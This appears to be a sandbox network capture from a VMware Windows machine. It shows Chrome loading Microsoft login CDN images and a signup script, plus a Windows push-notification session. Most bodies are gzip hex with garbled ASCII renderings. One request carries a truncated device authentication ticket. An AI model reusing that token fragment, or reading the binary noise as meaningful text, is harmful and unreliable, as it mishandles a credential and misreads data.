2024-08-31 22:54:42 UTC	252	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 cb aa c3 20 10 fd 15 71 ed 63 6c ac 26 c5 04 da 7d 7f e0 ee 02 0d 31 d0 17 55 6a 3f bf 6a 52 b8 e5 26 9b bb e9 a2 a8 87 d1 f1 38 e7 0c 68 dc bd 47 8f d3 f1 ec 6a 6c bd bf 6e 38 0f 21 b0 50 b0 cb ad e7 2b 00 e0 f1 06 46 61 38 78 5b 63 a1 30 b2 dd d0 5b 3f c6 f7 a1 0b bb cb a3 c6 80 00 09 15 27 6e 8c 1f fc b1 6b 5a e7 3a ef 0c 1f 77 e6 da 7a 8b 0e 35 de 0b 26 64 41 14 2b d7 ba 8d 31 68 32 22 c4 21 08 93 52 31 28 ab 74 a8 e4 84 53 4a 81 4e 2b 1f 8a 09 c7 14 10 56 56 c5 5f 0e fd cd 79 af 44 5f 95 b6 33 22 34 a9 18 ac 65 3b ff 20 5d 52 41 93 8a ed 8c 72 1d fd 56 52 2d f8 a5 49 c6 be fc 44 4f de 39 59 7f 0a fe 61 7b 41 5c 26 cd b4 78 72 7b ca 48 e0 4b 5c 0b 99 ed 66 d3 3f 98 37 26 7d ae e6 09 a7 d4 d5 8c 84 03 00 00 Data Ascii: S qcl&}1Uj?jR&8hGjln8!P+Fa8x[c0[?'nkZ:wz5&dA+1h2"!R1(tSJN+VV_yD_3"4e; ]RArVR-IDO9Ya{A\&xr{HK\f?7&}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49758	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:42 UTC	419	OUT	GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:42 GMT Content-Type: image/svg+xml Content-Length: 263 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:06 GMT ETag: 0x8D79ED359401A9D x-ms-request-id: 954d6a61-401e-000b-4af5-fa0790000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225442Z-16579567576p25xcxh3nycmsaw000000053g00000000n4h4 x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:42 UTC	263	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 c9 6e c3 20 10 fd 15 44 af 2c 43 4d c0 ae c0 52 7a cf 0f f4 66 29 ae 8d e4 2c 2a 28 e4 f3 0b d8 95 1a d5 be f4 d2 43 59 9e 86 19 86 79 6f 24 8c bf 0d e8 7e 9a ce de e2 31 84 eb 0b e7 31 46 16 2b 76 f9 18 f8 33 00 f0 74 03 a3 e8 8e 61 b4 58 28 8c c6 de 0d 63 98 ed 9b eb e3 eb e5 6e 31 20 40 42 a5 85 5b 13 5c 98 fa b6 f3 be 0f de f0 f9 64 ae 5d 18 d1 bb 9b 26 8b 9f 74 19 18 1d 2d 3e 08 26 64 45 14 ab 77 ba 4b 36 68 32 23 a4 29 08 93 52 31 a8 9b ec 54 72 c1 25 a4 40 e7 5d 9c 62 c1 39 04 84 d5 4d f5 33 87 7e cf 79 ac 44 bf 2a ed 57 48 68 d2 30 d8 c9 6e fd 41 ba c5 82 66 16 fb 15 e6 3a e9 6d a4 da d0 4b 33 8d 43 fd 17 3d 79 cc 29 fc b3 f1 0b d9 1b e4 4a d2 4a 8b 17 b5 a7 82 04 fe 89 6a 21 8b dc 22 fa 0d f3 d6 e4 bf d6 7e 02 Data Ascii: Sn D,CMRzf),(CYyo$~11F+v3taX(cn1 @B[\d]&t->&dEwK6h2#)R1Tr%@]b9M3~yDWHh0nAf:mK3C=y)JJj!"~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49757	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:42 UTC	420	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	807	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:42 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:07 GMT ETag: 0x8D79ED359808AB6 x-ms-request-id: 12ede69a-201e-000d-66f5-fa342f000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225442Z-16579567576gnfmq2acf56mm7000000005ag00000000gx2n x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:42 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	49767	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:52 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2f 43 6e 70 62 31 6a 76 72 6b 71 51 4d 75 6e 46 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 36 36 66 39 37 33 33 66 34 31 63 37 33 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: /Cnpb1jvrkqQMunF.1Context: 1466f9733f41c73a
2024-08-31 22:54:52 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-08-31 22:54:52 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 2f 43 6e 70 62 31 6a 76 72 6b 71 51 4d 75 6e 46 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 36 36 66 39 37 33 33 66 34 31 63 37 33 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 37 42 6f 6e 47 4e 65 45 4c 64 79 76 63 53 63 65 6e 48 56 42 2b 64 68 69 48 69 31 36 4f 43 45 66 54 71 33 4e 58 31 55 54 72 4c 71 65 34 76 79 79 52 76 41 4c 75 54 53 39 69 2f 65 67 41 2f 2b 63 32 33 6f 6f 4d 71 6a 47 55 4c 43 68 2b 4f 39 68 70 52 73 47 6c 32 48 56 6f 65 79 6a 79 6e 37 32 71 66 66 70 36 56 57 7a 64 66 31 46 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: /Cnpb1jvrkqQMunF.2Context: 1466f9733f41c73a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAW7BonGNeELdyvcScenHVB+dhiHi16OCEfTq3NX1UTrLqe4vyyRvALuTS9i/egA/+c23ooMqjGULCh+O9hpRsGl2HVoeyjyn72qffp6VWzdf1F
2024-08-31 22:54:52 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2f 43 6e 70 62 31 6a 76 72 6b 71 51 4d 75 6e 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 36 36 66 39 37 33 33 66 34 31 63 37 33 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: /Cnpb1jvrkqQMunF.3Context: 1466f9733f41c73a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-08-31 22:54:52 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-08-31 22:54:52 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 54 72 55 76 6f 51 79 41 53 30 32 52 47 6f 50 4f 6a 59 41 73 6c 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: TrUvoQyAS02RGoPOjYAslQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49772	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:56 UTC	603	OUT	GET /shared/5/js/signup-fabric_en_hjnWUmfm-pOUxYXWMUv1Yw2.js HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://signup.live.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://signup.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:56 UTC	827	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:56 GMT Content-Type: application/x-javascript Content-Length: 231091 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 20 Aug 2024 23:08:41 GMT ETag: 0x8DCC16D08882164 x-ms-request-id: 1870718b-801e-0066-44ce-fab3db000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225456Z-16579567576gnfmq2acf56mm7000000005cg00000000cqw2 x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:56 UTC	15557	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 69 77 db 38 d2 28 fc fd fd 15 b6 6e 8e 87 1c c3 8a 64 67 a5 c2 d6 4d 1c bb 93 ee 6c 1d 27 9d 4e bb 7d 7d 68 09 92 d8 91 48 85 a4 ec 38 b6 fe fb ad 05 2b 45 39 e9 99 67 9e 67 ee 7b 26 e7 c4 02 41 10 4b a1 00 54 15 6a b9 fd f7 cd 8d c3 bc d8 98 a6 03 99 95 72 23 cd 46 79 31 4b aa 34 cf 36 e6 53 99 40 56 29 e1 7f 3a ce 16 f3 9d 51 72 56 a4 83 53 99 b5 ff 2c db 2f 9e ef 1f bc 3a 3a 68 57 5f aa 8d bf df fe ff 36 47 8b 6c 80 df 05 e1 d5 79 52 6c 48 51 89 4c 14 22 17 69 7c f5 f0 6e 77 ef 6e 64 4a d0 bb f0 aa b5 c0 ea 2b a8 b2 6a f5 f0 9b 22 ce 82 bd 5d 28 1c 8a 3c be 1a 4c d2 e9 70 3f cf 2a f9 a5 7a 77 39 97 65 b4 d9 11 03 fb 5c 7b a4 d7 43 39 4a 16 d3 ea 4d 91 cf f9 39 2d e7 d3 e4 f2 55 32 a3 e2 63 59 3d ad 95 a0 ac 22 3d 97 Data Ascii: iw8(ndgMl'N}}hH8+E9gg{&AKTjr#Fy1K46S@V):QrVS,/::hW_6GlyRlHQL"i\|nwndJ+j"](<Lp?*zw9e\{C9JM9-U2cY="=
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: 3b 7b 2f 58 47 8f 75 3d 8c f5 04 5b ad c9 ed c2 35 95 d0 b1 da e4 23 ba 57 fa c1 68 e4 5e e1 77 11 50 aa 7c ce 55 3b 72 d9 93 71 b6 94 91 52 0c e1 36 a0 7e a8 ec 88 15 f8 d0 27 81 97 61 a2 3b 61 be 55 66 82 47 65 1d 4a 3d 2f dc f5 34 c9 5c cb a3 cd 60 13 63 5b d3 15 84 e4 c3 8b 72 f6 36 5d ec 21 25 63 b6 16 a9 2c 4a 71 4d 4e b3 61 d4 52 24 65 49 66 40 7d 43 62 96 a8 cb 87 46 bb c8 ac 43 79 8d 84 6f 14 e3 be b5 b5 b9 19 74 ef 6d ad 2d 80 97 90 2e 8f 77 96 05 f6 90 94 2a 1a 81 a8 62 40 46 40 6c 38 34 59 19 0e 5d 00 b5 71 8b 7a 4e 71 e6 15 0e 01 64 11 c1 94 0f 97 d5 ad 43 b9 5b fe c0 21 0e a6 f9 80 ed 12 d0 8f 9e 42 bb 02 f5 84 81 ad 60 cd 20 66 ad a9 f1 40 c6 b5 ef 43 13 23 c1 10 c6 8e c2 fa a5 ab 33 8d 58 aa fd 95 b8 e9 5a d4 55 5d 0b ba 2d 31 2e 4d e8 89 Data Ascii: ;{/XGu=[5#Wh^wP\|U;rqR6~'a;aUfGeJ=/4\`c[r6]!%c,JqMNaR$eIf@}CbFCyotm-.w*b@F@l84Y]qzNqdC[!B` f@C#3XZU]-1.M
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: 3b 9b 87 1d ef f4 fb 35 34 c4 58 17 f8 d3 de 42 bc ab d2 e8 e2 52 a9 e5 42 17 03 b9 4c 28 dd c6 f3 db 37 1a e7 36 0e e6 18 4f e4 2a 17 01 15 d4 e3 da bb 27 57 89 53 d7 ce 39 25 a9 b3 35 f3 d0 d3 45 e6 63 f4 d8 87 75 6d 29 72 e0 75 a5 71 34 f7 68 16 6e 97 bd de c6 fc 4e da c7 3b 80 5e 27 a4 05 7a 56 33 54 7a 01 93 08 03 90 a3 e6 35 ed 80 41 cc 61 5c b4 16 40 02 0c da ab 41 a2 14 be 0c d9 a5 4e 5b 8a 3f db 28 1b a8 4d b7 8e 49 66 c0 cb bb 42 3e 7f 05 1c 06 7b 3b 96 7f 23 f8 cf 78 b2 27 b9 1b d9 cc 74 56 48 b3 f6 e4 b3 76 b3 30 84 8f 9c 31 2e a9 c6 a0 65 10 bb 4e 65 28 3b fb 89 70 c9 28 23 af 0f 95 63 1c b5 d4 85 31 aa eb 1b 20 92 75 99 03 03 42 5c 0f 50 75 ce 38 87 65 00 53 e2 0a cb 79 e3 e4 c7 61 26 a9 c4 3c 84 56 3e d9 dc 8e 2c c0 f8 6c 3b f3 ba 53 d9 cc Data Ascii: ;54XBRBL(76O*'WS9%5Ecum)ruq4hnN;^'zV3Tz5Aa\@AN[?(MIfB>{;#x'tVHv01.eNe(;p(#c1 uB\Pu8eSya&<V>,l;S
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: e2 2b 08 06 4e 09 f8 78 96 a0 d4 b3 47 b1 86 38 9d 2c 93 b7 34 01 5a 24 99 9e 1e 3a 83 98 db 86 e3 e1 be 26 fd 7e ed 02 ef a3 44 33 4c e6 e3 e6 1e a6 bb 19 79 ed 4d a7 f6 1b d6 5d ed 15 33 f9 e6 6f e9 8c a9 eb 75 5b da 84 75 58 a3 3c 4b e4 23 8b 0e 27 e5 1c d3 18 c0 eb e8 59 2b 47 d0 fb 1b 03 c6 d8 14 96 c5 7c f1 5b 17 63 5f b9 f3 05 ef bc 16 a2 fd 9d 2f 58 e4 69 ef a2 3e 92 95 bb 51 fd be 19 7c 65 0f 53 79 6d a9 42 e8 48 72 7a 74 dd 93 be 47 4a cc a3 df 21 96 14 d4 5f c5 fa e3 20 02 98 ee 88 5e 19 cf 2e 74 a8 cf 2c f8 8c 6e 34 b7 95 28 cb 56 42 87 a2 11 d9 38 58 85 ae 98 2f b3 3e 83 e2 81 f4 cc 65 5d 1c 26 65 15 ea 87 b7 dc 77 43 18 d6 9c a9 89 3f 71 ae 48 66 86 43 ef 46 96 08 2e 5b 04 1a f1 c4 1a d5 a6 2c 69 d9 b3 d3 e2 a5 ee 90 0f 67 64 09 e4 ca d8 dc Data Ascii: +NxG8,4Z$:&~D3LyM]3ou[uX<K#'Y+G\|[c_/Xi>Q\|eSymBHrztGJ!_ ^.t,n4(VB8X/>e]&ewC?qHfCF.[,igd
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: 35 bf 09 db 02 15 fb 7a 18 44 56 ea 35 27 8e db 5b 59 19 a3 cf ef 47 36 67 de 44 61 44 c9 8c 84 33 8c c1 50 fe 0e b7 46 37 3f 85 9b cb 4f 9e 6c 75 90 18 d3 25 76 3b 9e 87 ac 06 24 e8 bc ca b8 5e 50 7d 48 01 cb ab 44 4e 63 00 06 da 1d ca 8e 0f c6 af b1 1f 4d f8 e0 45 ae 0e 08 e0 32 15 60 80 4c 84 d8 d6 ef 29 b8 84 31 3b d0 40 4b 70 61 65 ef 7a 75 f6 a0 3a d9 53 98 a4 e3 52 dc 39 54 38 85 a3 8c ce c3 0d e6 86 ce b2 ad 62 72 40 4b 34 52 7b 4c 0c 8d 5e b7 8c ee bd 81 fb 55 40 62 2f 57 57 a8 d6 9f 89 ba 75 63 79 a3 a0 20 07 72 78 df 25 17 cf eb e9 a6 ed 9f 08 e0 d3 5d aa e9 99 cf bb 05 4a 06 ef 91 7e 31 18 76 ed 04 24 23 80 be 1a 59 d6 53 dc 44 de 3f 98 73 59 a7 d7 a6 2d 02 58 c2 c4 e0 3a 8e 7d 06 6b a3 9e 7b a3 c0 37 ee 9f 16 b2 33 39 3b a5 c5 1c e1 c7 55 6a Data Ascii: 5zDV5'[YG6gDaD3PF7?Olu%v;$^P}HDNcME2`L)1;@Kpaezu:SR9T8br@K4R{L^U@b/WWucy rx%]J~1v$#YSD?sY-X:}k{739;Uj
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: cf 8d d7 08 e0 e5 68 24 a8 7a 30 ef 9c cd 94 a6 5c 97 d7 f9 dc f1 3d c0 96 27 df 6d 47 67 bd ee 18 4f ce 73 be 55 b4 fa 56 9a b0 8b c2 3a d0 94 b5 1d 98 a9 38 64 80 b8 ef 08 60 6f 04 0c 6b 34 fd 68 6b fa 1d fe 29 01 66 fe 9e 7f 3c 05 c9 5d df 57 ae 94 71 4b c8 29 43 14 be 1b db 2f dc 66 74 f4 59 39 5e 9e 90 09 d7 21 0a 55 85 25 dd 62 43 be cd 7a cc ee 02 d2 09 a2 ea 3e e6 1d d2 c9 3c 9f 3d 99 1c 66 47 93 e5 54 12 c4 98 de 52 e8 34 db 95 19 98 e1 0b b5 7d 20 49 5c a7 78 c6 94 09 45 db 21 cd da 0e eb 11 6c cc 5c 95 4d 35 3e 67 2c 66 38 7b b4 07 83 22 20 71 86 84 51 8e f2 83 f8 72 47 fe f2 3e 57 03 af 14 f7 23 99 34 c7 dc 33 18 93 05 26 2c dc b7 73 16 21 83 4d 1e bb 1a b9 86 bb eb 1f 72 f6 80 51 a6 5f 33 c4 f1 b4 5e e0 02 68 69 0f 56 1b ab 7c 40 f5 b5 b2 ec Data Ascii: h$z0\='mGgOsUV:8d`ok4hk)f<]WqK)C/ftY9^!U%bCz><=fGTR4} I\xE!l\M5>g,f8{" qQrG>W#43&,s!MrQ_3^hiV\|@
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: d9 9a d6 d4 70 9f 9a a7 35 54 c9 d3 9e 41 b3 f5 73 1d bc 55 26 b2 6f d1 f1 78 2d 7f d3 b9 0f de c8 ce 66 20 fc 31 a5 b7 f6 20 c0 6a 83 49 18 ad 06 b3 2c a1 0f 17 b3 e2 8c 95 5d 6c d3 ca 7b d0 c7 8a 79 af 14 92 39 73 c0 4c 14 65 eb e2 a1 5b e7 2e a2 39 50 99 63 7a b8 6e a8 29 ea 4b 28 48 8d e3 f9 e3 5c 3c dd 2c 81 95 37 d1 a5 7d 63 f8 b7 4c 6e e5 9a 9e 3f 04 95 a9 f1 98 98 cf 6e 6d 1b 40 19 7c e6 5b 5c 0d 14 2b 50 bd bf 57 9a ea 37 f9 37 ae 5f 1d ac f6 50 9a c1 7c 70 69 ba b6 86 59 dd 3b 18 64 57 3d fd 8d b8 e7 b9 05 71 2c ff 0b 51 20 73 f0 df bf 6f 0e fe fa db 70 f0 df 77 e2 e0 bf 5d 32 07 ff fd 8a 38 f8 6f 57 c0 c1 ff e0 db 43 1c c9 af 19 61 cb c3 9b 36 8f 30 e9 70 ce 65 a6 39 71 ee fe 65 87 ee fc 68 1d 16 19 ff 69 3e 9e d9 c9 f0 53 97 b6 ab 17 8e d6 c8 Data Ascii: p5TAsU&ox-f 1 jI,]l{y9sLe[.9Pczn)K(H\<,7}cLn?nm@\|[\+PW77_P\|piY;dW=q,Q sopw]28oWCa60pe9qehi>S
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: 09 57 6e 02 98 4d f3 89 81 dd b3 cb 37 b0 47 53 7e e2 2f b3 d0 20 2e b1 88 e0 40 d4 68 20 c5 9b d8 23 be 18 04 c7 8b 83 82 7d 38 d8 81 c1 30 89 3c 41 72 96 f6 f1 9c d0 4f 51 b7 d0 ca 16 65 49 45 2b 10 28 98 02 a1 c2 78 89 91 84 8c 80 2e 56 9c f6 2d d4 9d d2 87 2f a8 fc 15 05 61 19 98 2c 5b 19 b3 50 76 1d 4d b8 91 25 b5 95 a5 68 5c d3 ae e0 86 fb fe fe 4e 5c 5c 37 ae ae 27 ca 45 29 d1 1d 9b 9f d7 8b d3 d4 45 26 59 9d 12 a1 29 83 fb 47 6a e7 f4 0b 81 fd 55 36 27 76 81 0a 84 13 f8 0b d4 49 23 7a 34 30 67 5b 94 a7 a1 3d ba 68 e6 95 b2 10 c8 0a 87 c1 08 ba a1 da 10 85 5d 80 d9 ad c1 1c e6 18 86 f0 d7 98 a8 ef f0 84 11 69 af c2 36 40 33 66 6c 7c 44 1b 1f 61 e3 a3 6b 45 db c0 b9 68 16 d8 db 94 cc db 81 c6 bc 01 6f c2 1b 14 93 0d 78 b6 36 00 96 12 e7 17 01 fa 58 Data Ascii: WnM7GS~/ .@h #}80<ArOQeIE+(x.V-/a,[PvM%h\N\\7'E)E&Y)GjU6'vI#z40g[=h]i6@3fl\|DakEhox6X
2024-08-31 22:54:57 UTC	16384	IN	Data Raw: 2e fd 27 20 58 1c 09 a1 73 31 16 c2 e9 34 1a ae 62 48 e3 21 2c 9e c5 84 c1 ab 63 02 5c 4e ab de 9b 37 d9 d0 48 31 6a e1 5d 11 bb 90 5b 21 3e 9a bd 8e 6f 01 fb d0 b3 80 31 dd e3 da e5 05 e2 e5 de 6f 92 d4 bb 0f 50 0e 5f ba 49 e0 1d b9 b7 c1 08 f5 8c 60 b0 87 3e 86 5b 90 cd d9 68 ef 39 70 28 64 f9 18 46 1d b6 a6 6e 36 a6 8a 33 f8 48 7d 37 19 8c 61 bc 92 57 a9 7f 81 0a c6 68 ed 3c 75 e0 37 0c 30 05 02 e4 b5 f5 36 60 e9 15 a0 22 57 a0 f7 97 70 81 ad 07 d9 16 50 28 bc 25 7b c6 b0 23 1b a5 f7 56 aa 0d 03 70 19 10 31 a6 a5 28 ad 04 61 30 b1 c8 01 fc 94 bb 80 aa f2 7c 17 42 27 32 ad f9 80 0a 8b 2d 4d 9d 3b f4 98 3f 73 ba f8 67 5a 5e 94 fc f9 ad c6 17 57 b0 be ba f0 83 6e 8c c9 d5 e1 96 85 5e 02 30 04 67 96 c5 11 70 7a 8d 46 fd 3a f5 c3 a1 50 cd ae 42 bf ad 2d 7a Data Ascii: .' Xs14bH!,c\N7H1j][!>o1oP_I`>[h9p(dFn63H}7aWh<u706`"WpP(%{#Vp1(a0\|B'2-M;?sgZ^Wn^0gpzF:PB-z
